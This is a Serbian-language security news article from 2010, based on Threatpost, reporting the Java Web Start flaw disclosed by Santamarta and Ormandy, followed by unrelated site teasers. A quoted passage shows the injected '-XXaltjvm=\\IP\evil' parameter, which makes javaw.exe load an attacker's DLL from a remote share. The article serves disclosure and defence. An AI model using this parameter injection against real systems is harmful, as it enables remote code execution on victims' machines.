Ozbiljan propust u novoj verziji Java pogađa sve aktuelne verzije Windows-a

Vesti, 12.04.2010, 01:37 AM

Postoji ranjivost u Java koja predstavlja ozbiljan problem jer ostavlja korisnike svih aktuelnih verzija Windows-a otvorenim za napade koji mogu dovesti do potpunog kompromitovanja pogođenog sistema. Dva istraživača su nezavisno jedan od drugog u petak objavili informacije o ranjivosti, tvrdeći da je ova ranjivost prisutna u okviru Java godinama unazad.

Problem leži u Java Web Strat framework, tehnologiji koju je razvio Sun Microsystems kako bi se omogućila jednostavnija primena Java aplikacija. U suštini, JavaWS tehnologija ne proverava parametre koje dobija od komandne linije, pa napadači mogu kontolisati ove parametre korišćenjem posebnih HTML oznaka na web strani, rekao je Ruben Santamarta u svom članku objavljenom u petak.

Tavis Ormandy je istog dana objavio svoj tekst o ovom nedostatku u Full Disclosure mailing list-u. Ormandy smatra da deaktiviranje Java dodatka nije dovoljno za prevenciju eventualnog iskorišćavanja ovog propusta, zbog toga što je ranjivi deo zasebno instaliran.

Ukratko, ukoliko imate poslednju verziju Java na svom kompjuteru, možete se smatrati pogođenim ovim propustom.

„Java.exe i javaw.exe podržavaju nepisani sakriveni parametar komandne linije „-XXaltjvm" i "-J-XXaltjvm" (videti -J switch u javaws.exe). Ovo upućuje Java da učita alternativnu JavaVM biblioteku (jvm.dll ili libjvm.so) sa željene putanje (path). Igra je završena. Možemo setovati -Xxaltjvm=\\IP\evil, na ovaj način javaw.exe će učitati naš loš jvm.dll. Bye, bye ASLR, DEP...“, piše Santamarta.

S obzirom da JavaWS tehnologija uključuje Java Runtime okruženje, koje se koristi u većini browser-a, ranjivost pogađa sve ove programe, uključujući Firefox, Internet Explorer i Chrome, na svim verzijama Windows-a, počev od Windows 2000 do Windows 7, tvrdi Santamarta. Browseri koji rade na Apple-ovom Mac OS X nisu ovim pogođeni.

U svom članku Ormandy kaže da je obavestio Sun o ovoj ranjivosti ali da proizvođač nije poverovao da je problem dovoljno ozbiljan i da zahteva urgentnu zakrpu.

„Programske alatke omogućavaju samo minimum provere URL parametara, dopuštajući nam dodavanje proizvoljnih parametara javaws programu, što obezbeđuje dovoljnu funkcionalnost preko komandne linije dozvoljavajući ovoj grešci da bude iskorišćena. Lakoća sa kojom ova greška može biti otkrivena uverila me je da je objavljivanje ovog dokumenta u najboljem interesu svih nas osim proizvođača,” kaže dalje u svom članku Ormandy.

Ovaj problem se može izbeći deaktiviranjem JavaWS i Java.exe, kaže Santamarta u svom postu.

Julien Tinnes daje dodatne informacije o ovoj vrsti Java ranjivosti.

Izvor: http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-browsers-040910


Prijavite se na našu mailing listu i primajte najnovije vesti (jednom dnevno) putem emaila svakog radnog dana besplatno:

Izdvojeno

Farmakokriminal na internetu: Facebook, X i Instagram preplavljeni oglasima za kopije poznatih lekova

Farmakokriminal na internetu: Facebook, X i Instagram preplavljeni oglasima za kopije poznatih lekova

Hiljade lažnih onlajn apoteka koje prodaju kopije lekova širom sveta, uključujući i kopije popularnog Ozempica, leka za lečenje dijabetesa tipa ... Dalje

Rusija i Ukrajina na vrhu prvog svetskog indeksa sajber kriminala

Rusija i Ukrajina na vrhu prvog svetskog indeksa sajber kriminala

Časopis PLOS ONE objavio je 10. aprila naučni rad pod nazivom „Mapiranje globalne geografije sajber kriminala sa svetskim indeksom sajber krim... Dalje

Prevare sa lažnim glasovnim porukama u porastu: LastPass objavio detalje o jednom takvom napadu na kompaniju

Prevare sa lažnim glasovnim porukama u porastu: LastPass objavio detalje o jednom takvom napadu na kompaniju

LastPass je objavio da su prevaranti pokušali da prevare jednog od zaposlenih u kompaniji koristeći lažnu glasovnu poruku izvršnog direktora Last... Dalje

Istraživanje otkriva da većina ljudi ima između 3 i 10 onlajn naloga, ali stvaran broj bi mogao biti i mnogo veći

Istraživanje otkriva da većina ljudi ima između 3 i 10 onlajn naloga, ali stvaran broj bi mogao biti i mnogo veći

Hteli to ili ne, onlajn nalozi su sada sastavni deo naših života. Broj naloga na mreži koje neko ima direktno je propcionalan šansi da postane žr... Dalje

Apple ažurira sistem upozorenja o špijunskom softveru

Apple ažurira sistem upozorenja o špijunskom softveru

Apple je revidirao svoju dokumentaciju u vezi sa sistemom upozoravanja za pretnje od komercijalnog špijunskog softvera, precizirajući da kompanija ... Dalje